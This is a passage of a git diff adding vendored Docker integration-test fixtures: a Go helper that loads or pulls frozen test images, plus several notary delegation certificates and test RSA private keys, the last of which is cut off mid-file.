zt^SAcHvH+*phv{y_9nO&aXZ27@H1gNA7uuCn|I7u4AJ4h5%>!(#?o<k<!p`c+$L)^
zx^aqS1vV?0O%ft<p?6`tp*Q~F@gFYHJ;dk##{a{>4@01sM9=?Y<}U-wbn}~IT=+q)
zpnU-y`(0?Hj|bqk-Cup*+8<p&^#3tnME?IE=Eok~+dntWvBkfrTyNm}fB%=e@xQh|
zFhleIFJk?B4?^4j;rAXx<%s|hAOb{y2oM1xKm>>Y5g-CYfCvx)B0vO)01+SpM1Tko
z0U|&IhyW2F0z`la5CI}U1c(3;cp3zTzMXo^%Y*&<Ux)R7DEY*<#88FUzyApw^}n?K
z&%^hT!S+9${_mFkaX|=r|M%gIk1de??@=&6*+vGB|5NDyr0Vs5x5qyd^#1Ro^qGzR
zZ)i6_EzC~;H*`snUKVwGy&yRTHfC_i*;MK&hzUw<N?cO{?#lmi>eXctdy*>?6A8Sq
zp|r}Cz7&k%LWj}|qk_p<LR6?ql%?k;qVj|#&~dHDx^L~F+bv+}XD9#r$ICb0T;kvB
z??%JbZ@0yN0Dy~7IuUS9NtwBp-dL}s5V+`sO9AD;z=W3(*CgT@HBTnW$aQHG=O_uZ
zXp4sy|MB%gOAjvodoEq<j`;71b%0~Uf9o6Gp4RUKx4vI%{ZKola&SUrubqqnf|6h)
z4wvLm5vzh1fiZ4bz#)UhAj(uq8Delo+A{96exG}w488FW*Z=k2VXyz&d;a4BK&1cs
zoV`w+)~1_gQFTpQrNyc1-qzO}_&)s?;QEh!nazg!KaT4Fll`~+9`f^JF?U^ey}Y_k
zi}P9KTi1RVuVw4~x{G>@3pT0=6BEu*_dHZBTzvXOYO{wlC)G^^hyW2F0z`la5CI}U
k1c(3;AOb{y2oM1xKm>>Y5g-CYfCvx)B0vO)z%wTBe{YUtx&QzG

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go
new file mode 100644
index 0000000000..13cd393f36
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go
@@ -0,0 +1,182 @@
+package load
+
+import (
+	"bufio"
+	"bytes"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	"github.com/pkg/errors"
+)
+
+var frozenImgDir = "/docker-frozen-images"
+
+// FrozenImagesLinux loads the frozen image set for the integration suite
+// If the images are not available locally it will download them
+// TODO: This loads whatever is in the frozen image dir, regardless of what
+// images were passed in. If the images need to be downloaded, then it will respect
+// the passed in images
+func FrozenImagesLinux(dockerBinary string, images ...string) error {
+	imgNS := os.Getenv("TEST_IMAGE_NAMESPACE")
+	var loadImages []struct{ srcName, destName string }
+	for _, img := range images {
+		if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil {
+			srcName := img
+			// hello-world:latest gets re-tagged as hello-world:frozen
+			// there are some tests that use hello-world:latest specifically so it pulls
+			// the image and hello-world:frozen is used for when we just want a super
+			// small image
+			if img == "hello-world:frozen" {
+				srcName = "hello-world:latest"
+			}
+			if imgNS != "" {
+				srcName = imgNS + "/" + srcName
+			}
+			loadImages = append(loadImages, struct{ srcName, destName string }{
+				srcName:  srcName,
+				destName: img,
+			})
+		}
+	}
+	if len(loadImages) == 0 {
+		// everything is loaded, we're done
+		return nil
+	}
+
+	fi, err := os.Stat(frozenImgDir)
+	if err != nil || !fi.IsDir() {
+		srcImages := make([]string, 0, len(loadImages))
+		for _, img := range loadImages {
+			srcImages = append(srcImages, img.srcName)
+		}
+		if err := pullImages(dockerBinary, srcImages); err != nil {
+			return errors.Wrap(err, "error pulling image list")
+		}
+	} else {
+		if err := loadFrozenImages(dockerBinary); err != nil {
+			return err
+		}
+	}
+
+	for _, img := range loadImages {
+		if img.srcName != img.destName {
+			if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil {
+				return errors.Errorf("%v: %s", err, string(out))
+			}
+			if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil {
+				return errors.Errorf("%v: %s", err, string(out))
+			}
+		}
+	}
+	return nil
+}
+
+func loadFrozenImages(dockerBinary string) error {
+	tar, err := exec.LookPath("tar")
+	if err != nil {
+		return errors.Wrap(err, "could not find tar binary")
+	}
+	tarCmd := exec.Command(tar, "-cC", frozenImgDir, ".")
+	out, err := tarCmd.StdoutPipe()
+	if err != nil {
+		return errors.Wrap(err, "error getting stdout pipe for tar command")
+	}
+
+	errBuf := bytes.NewBuffer(nil)
+	tarCmd.Stderr = errBuf
+	tarCmd.Start()
+	defer tarCmd.Wait()
+
+	cmd := exec.Command(dockerBinary, "load")
+	cmd.Stdin = out
+	if out, err := cmd.CombinedOutput(); err != nil {
+		return errors.Errorf("%v: %s", err, string(out))
+	}
+	return nil
+}
+
+func pullImages(dockerBinary string, images []string) error {
+	cwd, err := os.Getwd()
+	if err != nil {
+		return errors.Wrap(err, "error getting path to dockerfile")
+	}
+	dockerfile := os.Getenv("DOCKERFILE")
+	if dockerfile == "" {
+		dockerfile = "Dockerfile"
+	}
+	dockerfilePath := filepath.Join(filepath.Dir(filepath.Clean(cwd)), dockerfile)
+	pullRefs, err := readFrozenImageList(dockerfilePath, images)
+	if err != nil {
+		return errors.Wrap(err, "error reading frozen image list")
+	}
+
+	var wg sync.WaitGroup
+	chErr := make(chan error, len(images))
+	for tag, ref := range pullRefs {
+		wg.Add(1)
+		go func(tag, ref string) {
+			defer wg.Done()
+			if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil {
+				chErr <- errors.Errorf("%v: %s", string(out), err)
+				return
+			}
+			if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil {
+				chErr <- errors.Errorf("%v: %s", string(out), err)
+				return
+			}
+			if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil {
+				chErr <- errors.Errorf("%v: %s", string(out), err)
+				return
+			}
+		}(tag, ref)
+	}
+	wg.Wait()
+	close(chErr)
+	return <-chErr
+}
+
+func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) {
+	f, err := os.Open(dockerfilePath)
+	if err != nil {
+		return nil, errors.Wrap(err, "error reading dockerfile")
+	}
+	defer f.Close()
+	ls := make(map[string]string)
+
+	scanner := bufio.NewScanner(f)
+	for scanner.Scan() {
+		line := strings.Fields(scanner.Text())
+		if len(line) < 3 {
+			continue
+		}
+		if !(line[0] == "RUN" && line[1] == "./contrib/download-frozen-image-v2.sh") {
+			continue
+		}
+
+		frozenImgDir = line[2]
+		if line[2] == frozenImgDir {
+			frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images")
+		}
+
+		for scanner.Scan() {
+			img := strings.TrimSpace(scanner.Text())
+			img = strings.TrimSuffix(img, "\\")
+			img = strings.TrimSpace(img)
+			split := strings.Split(img, "@")
+			if len(split) < 2 {
+				break
+			}
+
+			for _, i := range images {
+				if split[0] == i {
+					ls[i] = img
+					break
+				}
+			}
+		}
+	}
+	return ls, nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
new file mode 100644
index 0000000000..2218f23c89
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
+BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
+VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4
+WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
+BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
+ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs
+Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7
+tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn
+fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ
+wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV
+B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB
+vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
+oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z
+ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV
+2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE
+Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p
+608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq
+JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt
+ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
new file mode 100644
index 0000000000..cb37efc94a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI
+OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW
+K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl
+PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv
+BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW
+8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7
+WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ
+R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB
+ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh
+mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj
+1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj
+uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY
+tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2
+OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr
+QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r
+I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2
+utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO
+Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi
+j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM
+kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA
+3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s
+Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS
+xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr
+84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq
+njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA==
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
new file mode 100644
index 0000000000..bec084790a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
+BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
+VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4
+WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
+BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
+ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW
+5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/
+L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM
+z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav
+c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk
+JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK
+9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
+oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx
+/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO
+x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8
+u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ
+W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L
+6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw
+/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
new file mode 100644
index 0000000000..5ccabe908f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH
+foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3
+AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY
+8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH
+VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ
+DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa
+zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY
+iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd
+FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT
+p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4
+c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+
+1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB
+aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf
+PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb
+wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT
+6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7
+hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB
+R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU
+RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP
+MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej
+YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH
+HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt
+TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR
+7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb
+SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0=
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
new file mode 100644
index 0000000000..f434b45fc8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
+BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
+VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5
+WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
+BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
+ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk
+C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA
+l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN
+h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw
+zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU
+biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT
+9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
+oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo
+Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88
+xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4
+YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed
+kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn
+WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8
+K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
new file mode 100644
index 0000000000..a61d18cc3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ
+zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe
+S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5
+PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo
+rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj
+9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T
+FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9
+7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq
+askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z
+OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN
+4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x
+YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy
+PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1
+AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL
+fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R
+H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui
+6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe
+A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu
+C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb
+Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC
+ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK
+JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f
+dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M
+M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw
+BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog=
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
new file mode 100644
index 0000000000..c8cbe46bdf
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
+BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
+VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5
+WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
+BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
+ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba
+Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh
+pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN
+PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC
+3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG
+Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI
+5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
+oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu
+VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi
+lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp
+Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2
+lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd
+mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4
+0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
new file mode 100644
index 0000000000..f473cc495a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt
+kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H
+ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+
